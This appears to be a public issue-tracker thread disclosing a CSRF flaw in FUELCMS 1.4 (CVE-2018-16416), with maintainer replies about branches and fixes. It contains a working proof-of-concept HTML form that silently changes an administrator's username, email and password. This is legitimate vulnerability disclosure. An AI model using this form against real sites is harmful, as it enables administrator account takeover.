Cross-site request forgery (CSRF) vulnerability

[anquanquantao]

Cross-site request forgery (CSRF) vulnerability in "http://127.0.0.1/fuel/my_profile/edit?inline=" in FUELCMS 1.4 allows remote attackers to hijack the authentication of unspecified users for requests that change administrator's password

Author:xichaokm

poc：

<span style="font-size:18px;"><!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF</title>
</head>
<form action="http://127.0.0.1/fuel/my_profile/edit?inline=" method="POST">
     <input type="hidden" name="user_name" value="hacker"><!--admin's name-->
     <input type="hidden" name="email" value="test@mail.com"><!--admin's email-->
　  <input type="hidden" name="first_name" value="admin">
　  <input type="hidden" name="last_name" value="admin">
　  <input type="hidden" name="new_password" value="xichao"><!--admin's password-->
　  <input type="hidden" name="confirm_password" value="xichao"><!--admin's password-->
　  <input type="hidden" name="Save" value="Save">
　  <input type="hidden" name="language" value="english">
　  <input type="hidden" name="fuel_inline" value="0">
    <button type="submit" value="Submit">GO</button>
    </form>
    </body>
</html></span>

[daylightstudio]

Is this with the develop branch?

[anquanquantao]

master branch

[daylightstudio]

There were some security updates to the develop branch recently that may have mitigated this.

[NicoleG25]

@daylightstudio could you point out the commit that fixed this issue?
Please note that CVE-2018-16416 was assigned to this vulnerability.